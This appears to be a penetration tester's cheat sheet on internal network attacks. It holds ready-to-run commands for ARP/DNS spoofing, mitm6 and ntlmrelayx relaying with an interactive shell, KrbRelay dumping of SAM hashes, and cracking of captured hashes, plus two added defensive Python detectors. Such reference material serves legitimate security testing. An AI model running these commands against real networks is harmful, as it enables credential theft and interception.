# Network Attacks

## Network Recon

{% content-ref url="/pages/l3OKqtVeA9iyUrXgQ6Dw" %}
[Host Discovery](/0xss0rz/pentest/recon/host-discovery.md)
{% endcontent-ref %}

```
bash find_cidrs.sh eth0
```

{% embed url="<https://github.com/nullenc0de/Internal_Pentest/blob/main/find_cidrs.sh>" %}

### Dismap

{% embed url="<https://github.com/zhzyker/dismap>" %}

### NetScan - From Windows Host

{% embed url="<https://www.softperfect.com/products/networkscanner/>" %}

### [Bettercap](#bettercap-1)

## Sniffing

Wireshark or tcpdump: are any credentials passing in clear text?

```bash
tcpdump -i eth0 -w packets.pcap -s 0
```

{% content-ref url="/pages/QOdfVpgJAKbIdkuowXZ9" %}
[Miscellaneous Techniques](/0xss0rz/pentest/privilege-escalation/linux/miscellaneous-techniques.md)
{% endcontent-ref %}

{% content-ref url="/pages/icl77XpNRA5tQcalZZzc" %}
[Interacting with Users](/0xss0rz/pentest/privilege-escalation/windows/interacting-with-users.md)
{% endcontent-ref %}

### Extract NTLMv1, etc

```
python3 ./Pcredz -f ../NTLMv1.pcapng
```

### Extract NTLMv2

{% embed url="<https://github.com/mlgualtieri/NTLMRawUnHide>" %}

```
# ./NTLMRawUnHide.py -i ../NTLMv2.pcap
                                                              /%(
                               -= Find NTLMv2 =-          ,@@@@@@@@&
           /%&@@@@&,            -= hashes w/ =-          %@@@@@@@@@@@*
         (@@@@@@@@@@@(       -= NTLMRawUnHide.py =-    *@@@@@@@@@@@@@@@.
        &@@@@@@@@@@@@@@&.                             @@@@@@@@@@@@@@@@@@(
      ,@@@@@@@@@@@@@@@@@@@/                        .%@@@@@@@@@@@@@@@@@@@@@
     /@@@@@@@#&@&*.,/@@@@(.                            ,%@@@@&##(%@@@@@@@@@.
    (@@@@@@@(##(.         .#&@%%(                .&&@@&(            ,/@@@@@@#
   %@@@@@@&*/((.         #(                           ,(@&            ,%@@@@@@*
  @@@@@@@&,/(*                                           ,             .,&@@@@@#
 @@@@@@@/*//,                                                            .,,,**
   .,,  ...
                                    .#@@@@@@@(.
                                   /@@@@@@@@@@@&
                                   .@@@@@@@@@@@*
                                     .(&@@@%/.  ..
                               (@@&     %@@.   .@@@,
                          /@@#          @@@,         %@&
                               &@@&.    @@@/    @@@#
                          .    %@@@(   ,@@@#    @@@(     ,
                         *@@/         .@@@@@(          #@%
                          *@@%.      &@@@@@@@@,      /@@@.
                           .@@@@@@@@@@@&. .*@@@@@@@@@@@/.
                              .%@@@@%,        /%@@@&(.


<-SNIP->

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 9859cf3a459c3365 

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 9859cf3a459c3365 

Found NTLMSSP Message Type 3 : Authentication
    > Domain                 : DOMAIN 
    > Username               : username 
    > Workstation            : DESKTOP-XXXXXX 

NTLMv2 Hash recovered:
username::DOMAIN:9859cf3a459c3365:2b56<-SNIP->52c21:0101000000000000868e5cd5587fd<-SNIP->ec730634c50a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00320038002e003100330036000000000000000000
```
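As an added example, not code from the original page or from the NTLMRawUnHide project, the following Python parses the same Type 3 (AUTHENTICATE) fields shown in the output above and classifies each logon as NTLMv1 or NTLMv2 from the NtChallengeResponse length, so a capture can be audited for hosts that still negotiate NTLMv1. The builder and the sample messages are constructed for the example, not taken from a real authentication.

```python
import struct

# MS-NLMP AUTHENTICATE (Type 3) layout: 8-byte signature, 4-byte type, six
# 8-byte field descriptors (Len, MaxLen, Offset), flags, Version, MIC, payload.
SIGNATURE = b"NTLMSSP\x00"
AUTH_HEADER_LEN = 88

def build_authenticate(domain, user, workstation, nt_response, lm_response=b"\x00" * 24):
    """Construct a Type 3 message (sample data only, not a real authentication)."""
    blobs = (lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b"")
    descriptors, payload = b"", b""
    for blob in blobs:
        descriptors += struct.pack("<HHI", len(blob), len(blob), AUTH_HEADER_LEN + len(payload))
        payload += blob
    flags = 0x00000001 | 0x00000200 | 0x02000000  # UNICODE | NTLM | VERSION
    return (SIGNATURE + struct.pack("<I", 3) + descriptors + struct.pack("<I", flags)
            + b"\x00" * 8 + b"\x00" * 16 + payload)  # zeroed Version and MIC

def _field(data, descriptor_offset):
    length, _maxlen, offset = struct.unpack_from("<HHI", data, descriptor_offset)
    return data[offset:offset + length]

def parse_authenticate(data):
    """Return domain, user, workstation and the NTLM flavour of a Type 3 message (UNICODE strings assumed)."""
    if data[:8] != SIGNATURE or struct.unpack_from("<I", data, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE message")
    nt_len = len(_field(data, 20))
    # A 24-byte NtChallengeResponse is NTLMv1 (plain or with extended session
    # security); NTLMv2 responses are longer; 0 bytes means anonymous.
    flavour = "anonymous" if nt_len == 0 else "NTLMv1" if nt_len == 24 else "NTLMv2"
    return {"domain": _field(data, 28).decode("utf-16-le"),
            "user": _field(data, 36).decode("utf-16-le"),
            "workstation": _field(data, 44).decode("utf-16-le"),
            "flavour": flavour}

def ntlmv1_users(messages):
    """List (domain, user, workstation) triples still authenticating with NTLMv1."""
    parsed = map(parse_authenticate, messages)
    return [(m["domain"], m["user"], m["workstation"]) for m in parsed if m["flavour"] == "NTLMv1"]

if __name__ == "__main__":
    # Constructed sample traffic: one legacy NTLMv1 logon and one NTLMv2 logon
    sample = [build_authenticate("DOMAIN", "legacy", "OLDPC", b"\x11" * 24),
              build_authenticate("DOMAIN", "alice", "DESKTOP-1", b"\x22" * 100)]
    for entry in ntlmv1_users(sample):
        print("NTLMv1 still in use:", entry)
```

On real traffic, feed the function the NTLMSSP blobs carved out of the SMB/HTTP sessions in the pcap; the classification is what tells you which hosts need NTLMv1 disabled.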

### NFS Data Extraction

{% embed url="<https://github.com/Rysess/NFSExtractor>" %}

### Finding vulnerabilities - Above

{% embed url="<https://github.com/casterbyte/Above?tab=readme-ov-file#installation>" %}

**Above** is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it generates no traffic of its own. It is invisible.


### Convert pcapng to pcap

```
tshark -F pcap -r NTLMv2.pcapng -w NTLMv2.pcap
```

## Open outbound ports / Filtering

### Web content filtering

For example, try to reach `4chan` or `exploit-db` from the CLI, and also from a browser.


#### Living Off Trusted Sites

Try to access some of the LOTS (Living Off Trusted Sites) domains.

{% embed url="<https://lots-project.com/>" %}

### Port Filtering

Test for other ports: 22, 21, 23, etc.

{% embed url="<http://portquiz.net/>" %}


```powershell
$ports = @(20, 21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 3389, 8080)

$hostname = "portquiz.net"

foreach ($port in $ports) {
    $result = Test-NetConnection -ComputerName $hostname -Port $port -InformationLevel Detailed
    if ($result.TcpTestSucceeded) {
        Write-Output "Port $port is open on $hostname"
    }
}
```


### Protocol Filtering

For example, if port 22 is blocked, also test for protocol filtering: does SSH get through on port 443?

Server side:

```bash
sudo nano /etc/ssh/sshd_config
# Add or change the Port directive
Port 443
# Restart SSH
sudo systemctl restart ssh
# or
sudo service ssh restart
# If necessary, open port 443 in the firewall
sudo ufw allow 443/tcp
```

Then try to connect over port 443:

```
ssh -p 443 username@server_ip
```

> *The Protocol Filter feature is used to block unwanted traffic from your network. The feature is commonly used to make sure employees, students or end users are using their Internet access for its intended productive use. The filter can block dozens of different protocols, including: peer-to-peer traffic (Source: ClearOS)*

## ARP - DNS Spoofing

### Bettercap

Standalone version:

```
wget https://github.com/bettercap/bettercap/releases/download/v2.31.1/bettercap_linux_amd64_v2.31.1.zip
```

```
root@box:/tmp# apt install libpcap-dev
root@box:/tmp# apt install libusb-1.0-0
root@box:/tmp# apt install libnetfilter-queue1
root@box:/tmp# apt install iproute2
```

{% embed url="<https://www.stationx.net/bettercap-tutorial/>" %}

```bash
# Host discovery
net.probe on
# Show all discovered hosts
net.show
# ARP spoof a single target
set arp.spoof.targets 192.168.37.133
arp.spoof on
# Spoofing the entire subnet is the default when arp.spoof.targets is left empty /!\ not recommended
# By default only connections to and from the external network are spoofed;
# arp.spoof.internal is a boolean, set it to true to also spoof connections between LAN hosts
set arp.spoof.internal true
# Save the captured packets to a pcap file (set before starting the sniffer)
set net.sniff.output filename.pcap
# Capture data
net.sniff on
# DNS spoofing
set dns.spoof.domains github.com
dns.spoof on
```

### Arpspoof

```
$ apt install dsniff
$ apt-get install tcpdump

$ arpspoof -i eth0 -t [IP1] [IP2]
$ arpspoof -i eth0 -t [IP2] [IP1]
# tcpdump options go before the capture filter expression
$ tcpdump -i eth0 -w capture.pcap host [IP1] or host [IP2]
```
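As an added detection example, not code from the original page or from the bettercap or dsniff projects, the following Python parses raw Ethernet/ARP reply frames and flags the two patterns the commands above leave on the wire: an IP whose MAC binding changes, and one MAC answering for several IPs. The frames are constructed inline with a small builder, and every IP and MAC address in it is made up.

```python
import struct
from collections import defaultdict

ETH_ARP = 0x0806   # EtherType for ARP
ARP_REPLY = 2      # ARP opcode "is-at"

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build a raw Ethernet+ARP reply frame; used only to construct sample traffic."""
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    ip4 = lambda a: bytes(int(o) for o in a.split("."))
    eth = mac(target_mac) + mac(sender_mac) + struct.pack("!H", ETH_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet/IPv4, 6/4, opcode
           + mac(sender_mac) + ip4(sender_ip) + mac(target_mac) + ip4(target_ip))
    return eth + arp

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an ARP frame, or None otherwise."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_ARP:
        return None
    opcode = struct.unpack("!HHBBH", frame[14:22])[4]
    sha, spa = frame[22:28], frame[28:32]
    return opcode, ":".join(f"{b:02x}" for b in sha), ".".join(str(b) for b in spa)

def detect_arp_spoof(frames):
    """Flag IP->MAC binding changes and a single MAC claiming several IPs."""
    first_mac = {}              # ip -> MAC first seen answering for it
    claimed = defaultdict(set)  # mac -> set of IPs it has answered for
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _, mac, ip = parsed
        if ip in first_mac and first_mac[ip] != mac:
            alerts.append(f"{ip} moved from {first_mac[ip]} to {mac}")
        first_mac.setdefault(ip, mac)
        if ip not in claimed[mac]:
            claimed[mac].add(ip)
            if len(claimed[mac]) > 1:
                alerts.append(f"{mac} now answers for {sorted(claimed[mac])}")
    return alerts

# Constructed sample traffic (made-up addresses): two legitimate replies, then a third
# host answering for both the gateway and the victim, which is what arpspoof -t does.
GATEWAY, VICTIM, ATTACKER = "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:33", "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY, "192.168.37.1", VICTIM, "192.168.37.133"),
    build_arp_reply(VICTIM, "192.168.37.133", GATEWAY, "192.168.37.1"),
    build_arp_reply(ATTACKER, "192.168.37.1", VICTIM, "192.168.37.133"),
    build_arp_reply(ATTACKER, "192.168.37.133", GATEWAY, "192.168.37.1"),
]
```

Running `detect_arp_spoof(SAMPLE_FRAMES)` yields three alerts: both bindings moving to the third MAC, then that MAC answering for two IPs; on live traffic, feed it the raw frames from a `tcpdump -w` capture filtered on `arp`.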

### Eavesarp

Detects and exploits Stale Network Address Configurations (SNACs) via network traffic analysis and ARP poisoning techniques.

{% embed url="<https://github.com/ImpostorKeanu/eavesarp-ng>" %}

## LLMNR NBT-NS Poisoning

{% content-ref url="/pages/C3VfH3HrzKTrQ8j6TNyn" %}
[LLMNR NBT-NS Poisoning](/0xss0rz/pentest/internal-pentest/llmnr-nbt-ns-poisoning.md)
{% endcontent-ref %}

## ADIDNS Spoofing

{% content-ref url="/pages/HG3n193tt8EBBwPxo6z0" %}
[ADIDNS Spoofing](/0xss0rz/pentest/internal-pentest/adidns-spoofing.md)
{% endcontent-ref %}

## MITM6

{% embed url="<https://github.com/dirkjanm/mitm6>" %}

{% embed url="<https://cheatsheet.haax.fr/windows-systems/exploitation/ipv6/>" %}

```
mitm6 -d lab.local
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
```

```
ntlmrelayx.py -6 -wh 192.168.1.6 -tf target.txt -socks -debug -smb2support
```

## MITM MySQL

Use [CredSLayer](https://github.com/ShellCode33/CredSLayer) to extract the salts and password hash from the captured MySQL authentication exchange.


{% embed url="<https://fwhibbit.es/crackeando-credenciales-de-mysql-obtenidos-por-un-mitm-like-a-sir>" %}

```
$mysqlna$<Salt1><Salt2>*<password_hash>
```

```
hashcat -a 0 -m 11200 hash.mysql
```

## MITM - ASReproast

{% content-ref url="/pages/FPIbdosGSrSHYzhw5i4w" %}
[Misconfiguration](/0xss0rz/pentest/internal-pentest/misconfiguration.md)
{% endcontent-ref %}

## MITM - Kerberoast

{% content-ref url="/pages/WyP2ypGRBLxj0wkF4CEb" %}
[Kerberoast](/0xss0rz/pentest/internal-pentest/kerberoast.md)
{% endcontent-ref %}

## No LDAP Signing - KrbRelayUp

No-fix local privilege escalation in Windows domain environments where **LDAP signing is not enforced** (the default setting).

{% embed url="<https://github.com/Dec0ne/KrbRelayUp>" %}

## KrbRelay

{% embed url="<https://www.r-tec.net/r-tec-blog-windows-is-and-always-will-be-a-potatoland.html>" %}

{% embed url="<https://github.com/cube0x0/KrbRelay>" %}

* Cross-session attack:
  * `KrbRelay.exe -s <SESSION-ID> -clsid 354FF91B-5E49-4BDC-A8E6-1CB6C6877182 -ntlm`
* Read out local SAM database hashes:
  * `KrbRelay.exe -clsid F8842F8E-DAFE-4B37-9D38-4E0714A61149 -session <TARGET-SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -secrets`
* Relaying Kerberos to SMB for remote access:
  * `KrbRelay.exe -clsid f8842f8e-dafe-4b37-9d38-4e0714a61149 -session <SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -console`

## NTLM Relay

{% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %}
[SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md)
{% endcontent-ref %}

{% content-ref url="/pages/tlQPEp6Q1TbcrBfX9e0v" %}
[AD CS](/0xss0rz/pentest/internal-pentest/ad-cs.md)
{% endcontent-ref %}

## Kerberos Relay

<figure><img src="/files/oIUhv33oGufGx6dfx2aR" alt=""><figcaption><p><a href="https://github.com/CICADA8-Research/Penetration/blob/main/KrbRelay%20MindMap/KrbRelay.drawio.png">https://github.com/CICADA8-Research/Penetration/blob/main/KrbRelay%20MindMap/KrbRelay.drawio.png</a></p></figcaption></figure>

### Over HTTP

{% embed url="<https://www.synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with>" %}

### Over SMB

{% embed url="<https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/>" %}

{% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %}
[SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md)
{% endcontent-ref %}

{% content-ref url="/pages/tlQPEp6Q1TbcrBfX9e0v" %}
[AD CS](/0xss0rz/pentest/internal-pentest/ad-cs.md)
{% endcontent-ref %}

### Via DHCPv6-DNS-Takeover


{% embed url="<https://github.com/RedTeamPentesting/pretender>" %}

